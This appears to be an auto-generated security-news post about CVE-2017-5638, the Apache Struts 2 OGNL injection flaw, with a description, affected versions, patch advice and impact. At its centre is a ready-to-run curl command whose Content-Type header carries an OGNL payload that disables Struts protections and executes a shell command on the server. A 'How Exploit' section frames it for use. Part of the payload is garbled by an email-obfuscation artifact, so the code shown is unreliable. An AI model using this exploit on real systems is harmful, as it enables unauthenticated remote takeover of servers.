Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious Content-Type header is sent with a file upload request. The parser incorrectly evaluates the `Content-Type` value, allowing an attacker to inject Object-Graph Navigation Language (OGNL) expressions within the header. These expressions are then executed by the Struts framework. Since OGNL expressions can access and interact with the application’s underlying Java objects, this vulnerability permits remote attackers to execute arbitrary system commands on the server with the same privileges as the application itself. The attack does not require the application to have a file upload feature; the malicious payload is delivered entirely within the HTTP request header, making it easy to exploit.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How Exploit:
Craft malicious HTTP request with OGNL payload in Content-Type header. Use exploit code to achieve unauthenticated RCE. Leverage vulnerability for server compromise.
Protection from this CVE:
Apply official patch. Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules. Filter malicious Content-Type headers.
Impact:
Complete system takeover. Unauthorized data access. Server compromise. Full application control.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

